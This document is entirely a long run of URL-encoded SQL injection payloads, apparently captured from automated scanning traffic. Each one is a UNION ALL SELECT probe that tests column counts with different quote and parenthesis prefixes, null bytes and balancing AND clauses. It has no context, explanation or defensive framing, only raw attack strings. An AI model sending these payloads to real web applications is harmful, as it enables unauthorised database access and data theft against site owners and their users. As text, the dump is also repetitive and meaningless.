-1310%27%29%20UNION%20ALL%20SELECT%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%2C%208424%00 -3147%27%29%20UNION%20ALL%20SELECT%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%2C%203325%00 -8149%27%29%20UNION%20ALL%20SELECT%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%2C%207282%00 -8485%27%29%20UNION%20ALL%20SELECT%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%2C%201800%00 -9480%27%29%20UNION%20ALL%20SELECT%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%2C%203142%00 -3146%27%29%20UNION%20ALL%20SELECT%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%2C%207980%00 -1856%27%20UNION%20ALL%20SELECT%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%2C%207255%00 -7917%27%20UNION%20ALL%20SELECT%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%00 -5264%27%20UNION%20ALL%20SELECT%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%2C%206244%00 -2016%27%20UNION%20ALL%20SELECT%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%2C%205218%00 -4334%27%20UNION%20ALL%20SELECT%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%2C%207587%00 -1652%27%20UNION%20ALL%20SELECT%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%2C%201263%00 -6096%27%20UNION%20ALL%20SELECT%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%2C%203992%00 -4268%27%20UNION%20ALL%20SELECT%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%2C%208211%00 -2265%27%20UNION%20ALL%20SELECT%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%2C%203197%00 -3651%27%20UNION%20ALL%20SELECT%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%2C%201550%00 -7191%22%20UNION%20ALL%20SELECT%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%2C%202767%00 -7278%22%20UNION%20ALL%20SELECT%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%2C%203697%00 -3384%22%20UNION%20ALL%20SELECT%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%2C%201781%00 -9572%22%20UNION%20ALL%20SELECT%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%2C%205062%00 -1710%22%20UNION%20ALL%20SELECT%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%2C%205680%00 -6290%22%20UNION%20ALL%20SELECT%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%2C%204531%00 -9169%22%20UNION%20ALL%20SELECT%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%2C%201227%00 -8907%22%20UNION%20ALL%20SELECT%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%2C%207600%00 -1252%22%20UNION%20ALL%20SELECT%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%2C%203760%00 -4602%22%20UNION%20ALL%20SELECT%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%2C%201733%00 -1653%29%20UNION%20ALL%20SELECT%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%2C%209011%00%20AND%20%281434%3D1434 -8327%29%20UNION%20ALL%20SELECT%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%2C%204178%00%20AND%20%285436%3D5436 -2059%29%20UNION%20ALL%20SELECT%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%2C%207449%00%20AND%20%281318%3D1318 -8800%29%20UNION%20ALL%20SELECT%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%2C%202824%00%20AND%20%285527%3D5527 -4101%29%20UNION%20ALL%20SELECT%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%00%20AND%20%282124%3D2124 -6814%29%20UNION%20ALL%20SELECT%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%2C%209948%00%20AND%20%288088%3D8088 -2686%29%20UNION%20ALL%20SELECT%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%2C%204039%00%20AND%20%287717%3D7717 -4007%29%20UNION%20ALL%20SELECT%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%2C%207094%00%20AND%20%283710%3D3710 -1881%29%20UNION%20ALL%20SELECT%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%2C%208575%00%20AND%20%286123%3D6123 -2290%29%20UNION%20ALL%20SELECT%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%2C%205242%00%20AND%20%283797%3D3797 -7393%29%29%20UNION%20ALL%20SELECT%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%2C%203320%00%20AND%20%28%284011%3D4011 -4564%29%29%20UNION%20ALL%20SELECT%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%2C%203713%00%20AND%20%28%284394%3D4394 -1014%29%29%20UNION%20ALL%20SELECT%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%2C%204204%00%20AND%20%28%281243%3D1243 -5044%29%29%20UNION%20ALL%20SELECT%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%2C%208663%00%20AND%20%28%283508%3D3508 -1098%29%29%20UNION%20ALL%20SELECT%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%2C%201336%00%20AND%20%28%286162%3D6162 -2012%29%29%20UNION%20ALL%20SELECT%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%2C%201281%00%20AND%20%28%289638%3D9638 -5525%29%29%20UNION%20ALL%20SELECT%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%2C%206380%00%20AND%20%28%283411%3D3411 -2613%29%29%20UNION%20ALL%20SELECT%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%2C%204154%00%20AND%20%28%283589%3D3589 -1954%29%29%20UNION%20ALL%20SELECT%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%2C%207122%00%20AND%20%28%289555%3D9555 -5839%29%29%20UNION%20ALL%20SELECT%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%2C%209893%00%20AND%20%28%284801%3D4801 -3443%29%29%29%20UNION%20ALL%20SELECT%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%2C%209832%00%20AND%20%28%28%286886%3D6886 -6778%29%29%29%20UNION%20ALL%20SELECT%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%2C%204012%00%20AND%20%28%28%285724%3D5724 -6665%29%29%29%20UNION%20ALL%20SELECT%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%2C%202562%00%20AND%20%28%28%281580%3D1580 